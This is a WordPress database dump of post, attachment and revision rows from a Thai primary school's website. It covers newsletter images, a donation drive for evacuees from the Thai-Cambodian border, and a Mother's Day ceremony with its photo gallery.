(1925,1,'2025-08-14 10:17:54','2025-08-14 03:17:54','<!-- wp:image {\"id\":1926,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/14-68-724x1024.png\" alt=\"\" class=\"wp-image-1926\"/></figure>\n<!-- /wp:image -->','วารสาร 14/2568','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3-14-2568','','','2025-08-14 10:17:56','2025-08-14 03:17:56','',0,'http://pakhaeng.ssk.in.th/?p=1925',0,'post','',0),
(1926,1,'2025-08-14 10:17:25','2025-08-14 03:17:25','','14-68','','inherit','','closed','','14-68','','','2025-08-14 10:17:25','2025-08-14 03:17:25','',1925,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/14-68.png',0,'attachment','image/png',0),
(1927,1,'2025-08-14 10:17:54','2025-08-14 03:17:54','<!-- wp:image {\"id\":1926,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/14-68-724x1024.png\" alt=\"\" class=\"wp-image-1926\"/></figure>\n<!-- /wp:image -->','วารสาร 14/2568','','inherit','closed','closed','','1925-revision-v1','','','2025-08-14 10:17:54','2025-08-14 03:17:54','',1925,'http://pakhaeng.ssk.in.th/?p=1927',0,'revision','',0),
(1928,1,'2025-08-14 10:19:24','2025-08-14 03:19:24','<!-- wp:image {\"id\":1929,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/15-68-724x1024.png\" alt=\"\" class=\"wp-image-1929\"/></figure>\n<!-- /wp:image -->','วารสาร 15/68','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3-15-68','','','2025-08-14 10:19:26','2025-08-14 03:19:26','',0,'http://pakhaeng.ssk.in.th/?p=1928',0,'post','',0),
(1929,1,'2025-08-14 10:18:58','2025-08-14 03:18:58','','15-68','','inherit','','closed','','15-68','','','2025-08-14 10:18:58','2025-08-14 03:18:58','',1928,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/15-68.png',0,'attachment','image/png',0),
(1930,1,'2025-08-14 10:19:24','2025-08-14 03:19:24','<!-- wp:image {\"id\":1929,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/15-68-724x1024.png\" alt=\"\" class=\"wp-image-1929\"/></figure>\n<!-- /wp:image -->','วารสาร 15/68','','inherit','closed','closed','','1928-revision-v1','','','2025-08-14 10:19:24','2025-08-14 03:19:24','',1928,'http://pakhaeng.ssk.in.th/?p=1930',0,'revision','',0),
(1931,1,'2025-08-14 10:19:26','2025-08-14 03:19:26','<!-- wp:image {\"id\":1929,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/15-68-724x1024.png\" alt=\"\" class=\"wp-image-1929\"/></figure>\n<!-- /wp:image -->','วารสาร 15/68','','inherit','closed','closed','','1928-revision-v1','','','2025-08-14 10:19:26','2025-08-14 03:19:26','',1928,'http://pakhaeng.ssk.in.th/?p=1931',0,'revision','',0),
(1932,1,'2025-08-14 10:20:17','2025-08-14 03:20:17','<!-- wp:image {\"id\":1933,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/16-68-724x1024.png\" alt=\"\" class=\"wp-image-1933\"/></figure>\n<!-- /wp:image -->','วารสาร 16/68','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3-16-68','','','2025-08-14 10:20:45','2025-08-14 03:20:45','',0,'http://pakhaeng.ssk.in.th/?p=1932',0,'post','',0),
(1933,1,'2025-08-14 10:19:56','2025-08-14 03:19:56','','16-68','','inherit','','closed','','16-68','','','2025-08-14 10:19:56','2025-08-14 03:19:56','',1932,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/16-68.png',0,'attachment','image/png',0),
(1934,1,'2025-08-14 10:20:17','2025-08-14 03:20:17','<!-- wp:image {\"id\":1933,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/16-68-724x1024.png\" alt=\"\" class=\"wp-image-1933\"/></figure>\n<!-- /wp:image -->','วารสาร 16/68','','inherit','closed','closed','','1932-revision-v1','','','2025-08-14 10:20:17','2025-08-14 03:20:17','',1932,'http://pakhaeng.ssk.in.th/?p=1934',0,'revision','',0),
(1935,1,'2025-08-14 10:20:45','2025-08-14 03:20:45','<!-- wp:image {\"id\":1933,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/16-68-724x1024.png\" alt=\"\" class=\"wp-image-1933\"/></figure>\n<!-- /wp:image -->','วารสาร 16/68','','inherit','closed','closed','','1932-revision-v1','','','2025-08-14 10:20:45','2025-08-14 03:20:45','',1932,'http://pakhaeng.ssk.in.th/?p=1935',0,'revision','',0),
(1936,1,'2025-08-14 10:23:24','2025-08-14 03:23:24','<!-- wp:paragraph -->\n<p>วันที่ 29 กรกฎาคม พ.ศ. 2568 โรงเรียนบ้านหนองปลาเข็ง กอไหล่</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>นำโดย ท่านผู้อำนวยการเสน่หา พลโสภา พร้อมด้วยคณะครูและบุคลากรทางการศึกษา ได้นำสิ่งของเครื่องใช้ที่จำเป็น และทำอาหาร เพื่อบริจาคให้กับศูนย์อพยพ และเป็นขวัญและกำลังใจให้กับผู้ประสบภัยในพื้นที่ ที่มาจากชายแดน ไทย-กัมพูชา</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1937,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/S__10281031-1024x768.jpg\" alt=\"\" class=\"wp-image-1937\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1939,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/S__25690139-1024x768.jpg\" alt=\"\" class=\"wp-image-1939\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1938,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/S__10281043-1024x768.jpg\" alt=\"\" class=\"wp-image-1938\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1941,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/336048-768x1024.jpg\" alt=\"\" class=\"wp-image-1941\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1942,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/335147-1024x768.jpg\" alt=\"\" class=\"wp-image-1942\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1940,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/336040-1024x543.jpg\" alt=\"\" class=\"wp-image-1940\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','ช่วยเหลือผู้ประสบภัย ชายแดนไทย-กัมพูชา','','publish','closed','closed','','%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b9%80%e0%b8%ab%e0%b8%a5%e0%b8%b7%e0%b8%ad%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%aa%e0%b8%9a%e0%b8%a0%e0%b8%b1%e0%b8%a2-%e0%b8%8a%e0%b8%b2','','','2025-08-14 10:26:31','2025-08-14 03:26:31','',0,'http://pakhaeng.ssk.in.th/?p=1936',0,'post','',0),
(1937,1,'2025-08-14 10:23:02','2025-08-14 03:23:02','','S__10281031','','inherit','','closed','','s__10281031','','','2025-08-14 10:23:02','2025-08-14 03:23:02','',1936,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/S__10281031.jpg',0,'attachment','image/jpeg',0),
(1938,1,'2025-08-14 10:23:02','2025-08-14 03:23:02','','S__10281043','','inherit','','closed','','s__10281043','','','2025-08-14 10:23:02','2025-08-14 03:23:02','',1936,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/S__10281043.jpg',0,'attachment','image/jpeg',0),
(1939,1,'2025-08-14 10:23:02','2025-08-14 03:23:02','','S__25690139','','inherit','','closed','','s__25690139','','','2025-08-14 10:23:02','2025-08-14 03:23:02','',1936,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/S__25690139.jpg',0,'attachment','image/jpeg',0),
(1940,1,'2025-08-14 10:23:02','2025-08-14 03:23:02','','336040','','inherit','','closed','','336040','','','2025-08-14 10:23:02','2025-08-14 03:23:02','',1936,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/336040.jpg',0,'attachment','image/jpeg',0),
(1941,1,'2025-08-14 10:23:02','2025-08-14 03:23:02','','336048','','inherit','','closed','','336048','','','2025-08-14 10:23:02','2025-08-14 03:23:02','',1936,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/336048.jpg',0,'attachment','image/jpeg',0),
(1942,1,'2025-08-14 10:23:02','2025-08-14 03:23:02','','335147','','inherit','','closed','','335147','','','2025-08-14 10:23:02','2025-08-14 03:23:02','',1936,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/335147.jpg',0,'attachment','image/jpeg',0),
(1943,1,'2025-08-14 10:23:24','2025-08-14 03:23:24','<!-- wp:paragraph -->\n<p>วันที่ 29 กรกฎาคม พ.ศ. 2568 โรงเรียนบ้านหนองปลาเข็ง กอไหล่</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>นำโดย ท่านผู้อำนวยการเสน่หา พลโสภา พร้อมด้วยคณะครูและบุคลากรทางการศึกษา ได้นำสิ่งของเครื่องใช้ที่จำเป็น และทำอาหาร เพื่อบริจาคให้กับศูนย์อพยพ และเป็นขวัญและกำลังใจให้กับผู้ประสบภัยในพื้นที่ ที่มาจากชายแดน ไทย-กัมพูชา</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1937,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/S__10281031-1024x768.jpg\" alt=\"\" class=\"wp-image-1937\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1939,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/S__25690139-1024x768.jpg\" alt=\"\" class=\"wp-image-1939\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1938,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/S__10281043-1024x768.jpg\" alt=\"\" class=\"wp-image-1938\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1941,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/336048-768x1024.jpg\" alt=\"\" class=\"wp-image-1941\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1942,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/335147-1024x768.jpg\" alt=\"\" class=\"wp-image-1942\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1940,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/336040-1024x543.jpg\" alt=\"\" class=\"wp-image-1940\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','ช่วยเหลือผู้ประสบภัย ชายแดนไทย-กัมพูชา','','inherit','closed','closed','','1936-revision-v1','','','2025-08-14 10:23:24','2025-08-14 03:23:24','',1936,'http://pakhaeng.ssk.in.th/?p=1943',0,'revision','',0),
(1944,1,'2025-08-14 10:25:48','2025-08-14 03:25:48','<!-- wp:details -->\n<details class=\"wp-block-details\"><summary><strong>วันที่ 7 สิงหาคม 2568 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ นำโดย</strong><br><strong>นางเสน่หา พลโสภา ผู้อำนวยการโรงเรียน ได้จัดกิจกรรมวันแม่แห่งชาติ เนื่องในวันเฉลิมพระชนมพรรษา สมเด็จพระนางเจ้าสิริกิติ์ พระบรมราชินีนาถ พระบรมราชชนนีพันปีหลวง เพื่อแสดงความจงรักภักดีแด่องค์สมเด็จพระนางเจ้าสิริกิติ์ พระบรมราชินีนาถ พระบรมราชชนนีพันปีหลวง และเพื่อให้นักเรียนได้แสดงความเคารพ ความกตัญญูกตเวทีต่อผู้มีพระคุณ โดยกิจกรรมประกอบด้วย คณะครู บุคลากร นักเรียนและผู้ปกครอง โดยพิธีเริ่มจากประธานเปิดกรวยธูปเทียนแพร ถวายพุ่มเงิน พุ่มทอง และเปิดกรวยถวายราชสักการะ ลงนามถวายพระพร ประธานกล่าวถวายราชสดุดีเฉลิมพระเกียรติถวายพระพรชัยมงคล สมเด็จพระนางเจ้าสิริกิติ์ พระบรมราชินีนาถ พระบรมราชชนนีพันปีหลวง ทุกคนร่วมร้องเพลงสดุดีพระแม่ไทยและ ร้องเพลงสรรเสริญพระบารมี จากนั้นนักเรียนทุกคนแสดงความรักและกตัญญูต่อแม่ และมอบเกียรติบัตรให้กับแม่ดีเด่นประจำปี 2568 ณ ใต้ถุนอาคาร โรงเรียนบ้านหนองปลาเข็ง กอไหล่</strong></summary><!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1950,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_48-1024x576.jpg\" alt=\"\" class=\"wp-image-1950\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1945,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_46-1024x576.jpg\" alt=\"\" class=\"wp-image-1945\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1946,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_47-1024x576.jpg\" alt=\"\" class=\"wp-image-1946\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1947,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_45-1024x576.jpg\" alt=\"\" class=\"wp-image-1947\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1948,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_44-1024x576.jpg\" alt=\"\" class=\"wp-image-1948\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1949,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_42-1024x576.jpg\" alt=\"\" class=\"wp-image-1949\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1951,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_43-1024x576.jpg\" alt=\"\" class=\"wp-image-1951\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1952,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_41-1024x576.jpg\" alt=\"\" class=\"wp-image-1952\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1953,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_40-1024x576.jpg\" alt=\"\" class=\"wp-image-1953\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1955,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_39-1024x576.jpg\" alt=\"\" class=\"wp-image-1955\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1954,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_38-1024x576.jpg\" alt=\"\" class=\"wp-image-1954\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1956,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_36-1024x576.jpg\" alt=\"\" class=\"wp-image-1956\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1959,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_37-1024x576.jpg\" alt=\"\" class=\"wp-image-1959\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1957,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_35-1024x576.jpg\" alt=\"\" class=\"wp-image-1957\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1958,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_34-1024x576.jpg\" alt=\"\" class=\"wp-image-1958\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1960,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_33-1024x576.jpg\" alt=\"\" class=\"wp-image-1960\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1961,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_32-1024x576.jpg\" alt=\"\" class=\"wp-image-1961\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1962,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_31-1024x576.jpg\" alt=\"\" class=\"wp-image-1962\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1963,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_29-1024x576.jpg\" alt=\"\" class=\"wp-image-1963\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1965,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_30-1024x576.jpg\" alt=\"\" class=\"wp-image-1965\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1964,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_28-1024x576.jpg\" alt=\"\" class=\"wp-image-1964\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1967,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_27-1024x576.jpg\" alt=\"\" class=\"wp-image-1967\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1966,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_26-1024x576.jpg\" alt=\"\" class=\"wp-image-1966\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1968,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_25-1024x576.jpg\" alt=\"\" class=\"wp-image-1968\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1969,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_23-1024x576.jpg\" alt=\"\" class=\"wp-image-1969\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1970,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_24-1024x576.jpg\" alt=\"\" class=\"wp-image-1970\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1971,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_22-1024x576.jpg\" alt=\"\" class=\"wp-image-1971\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1972,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_21-1024x576.jpg\" alt=\"\" class=\"wp-image-1972\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1973,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_20-1024x576.jpg\" alt=\"\" class=\"wp-image-1973\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1974,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_19-1024x576.jpg\" alt=\"\" class=\"wp-image-1974\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1975,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_18-1024x576.jpg\" alt=\"\" class=\"wp-image-1975\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1976,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_17-1024x576.jpg\" alt=\"\" class=\"wp-image-1976\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1978,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_15-1024x576.jpg\" alt=\"\" class=\"wp-image-1978\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1977,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_16-1024x576.jpg\" alt=\"\" class=\"wp-image-1977\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1979,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_14-1024x576.jpg\" alt=\"\" class=\"wp-image-1979\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1980,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_13-1024x576.jpg\" alt=\"\" class=\"wp-image-1980\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1981,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_12-1024x576.jpg\" alt=\"\" class=\"wp-image-1981\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1984,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_10-1024x576.jpg\" alt=\"\" class=\"wp-image-1984\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1982,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_11-1024x576.jpg\" alt=\"\" class=\"wp-image-1982\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1983,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_9-1024x576.jpg\" alt=\"\" class=\"wp-image-1983\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1986,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_8-1024x576.jpg\" alt=\"\" 